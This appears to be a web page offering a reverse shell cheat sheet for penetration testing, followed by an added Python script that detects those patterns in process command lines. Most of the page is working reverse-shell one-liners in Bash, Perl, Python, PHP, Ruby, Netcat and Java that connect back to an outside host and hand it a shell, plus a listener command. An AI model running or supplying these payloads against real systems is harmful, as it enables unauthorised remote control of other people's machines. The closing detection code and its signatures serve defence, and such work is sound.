Reverse Shell Generator
A reverse shell provides an interactive command-line interface from a remote machine back to the attacker's machine: the remote machine opens the outbound connection and attaches a shell to it. This is a crucial technique in penetration testing and security assessments. Below are examples of reverse shell commands implemented in various popular programming languages and tools.
Bash Reverse Shell
The simplest and most common reverse shell, utilizing Bash's built-in networking capabilities.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl Reverse Shell
A Perl script that establishes a TCP connection and executes a shell.
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python Reverse Shell
A Python one-liner to create a reverse shell, leveraging the `socket` and `subprocess` modules.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell
A concise PHP snippet for establishing a reverse shell connection.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby Reverse Shell
A Ruby implementation for creating an interactive reverse shell.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat Reverse Shell
Using Netcat (nc) to initiate the reverse shell; the matching listener is shown in the next section. Note the use of `-e` for execution, which might not be available on all systems.
# Linux
nc -e /bin/sh target 4444 # or /bin/bash if sh doesn't work
# Windows
nc.exe 192.168.100.113 4444 -e cmd.exe
Netcat Listener
The command to set up a listener on the attacker's machine to receive incoming connections.
nc -lvnp 4444
Java Reverse Shell
A Java reverse shell example that redirects standard input, output, and error streams to a TCP socket.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
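Seen from the detection side, each one-liner above pairs a TCP connection with a shell or `exec` call, which makes the command line itself a usable signal. The following is an added example, not part of the original page: a Python matcher for those patterns, run over constructed process-creation records. The signature names, PIDs and 192.0.2.x addresses are assumptions made for the illustration.

```python
import re

# Signatures derived from the one-liners on this page: each pairs "open a TCP
# connection" with "attach a shell or exec to it". Names are this example's own.
SIGNATURES = {
    "bash-dev-tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "netcat-exec": re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S", re.I),
    "python-dup2": re.compile(r"socket\.socket\(.*os\.dup2\(", re.S),
    "perl-socket": re.compile(r"use Socket.*\bexec\(", re.S),
    "php-fsockopen": re.compile(r"fsockopen\(.*\bexec\(", re.S),
    "ruby-tcpsocket": re.compile(r"TCPSocket\.open\(.*\bexec\b", re.S),
}

# Constructed process-creation records (pid, command line); 192.0.2.0/24 is a
# documentation range. Shell redirections such as ">& /dev/tcp/..." only show
# up in argv when the command was passed through "bash -c" or "sh -c".
SAMPLE_EVENTS = [
    (4101, 'bash -c "bash -i >& /dev/tcp/192.0.2.10/8080 0>&1"'),
    (4102, "nc -e /bin/sh 192.0.2.10 4444"),
    (4103, "python -c 'import socket,os;s=socket.socket();"
           "s.connect((\"192.0.2.10\",1234));os.dup2(s.fileno(),0)'"),
    (4104, "php -r '$sock=fsockopen(\"192.0.2.10\",1234);exec(\"/bin/sh -i\");'"),
    (4201, "nc -zv 192.0.2.20 443"),          # port check, no -e
    (4202, "rsync -e ssh /srv/data backup:/srv/data"),
    (4203, "python -c 'import socket;print(socket.gethostname())'"),
]


def classify(cmdline):
    """Return the sorted names of all signatures matching one command line."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(cmdline))


def scan(events):
    """Map pid -> matched signature names for every event with at least one hit."""
    return {pid: hits for pid, cmd in events if (hits := classify(cmd))}


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(f"pid={pid} reverse-shell pattern(s): {', '.join(hits)}")
```

String signatures like these are a first-pass filter; correlating them with a shell process that owns an outbound socket gives a sturdier signal.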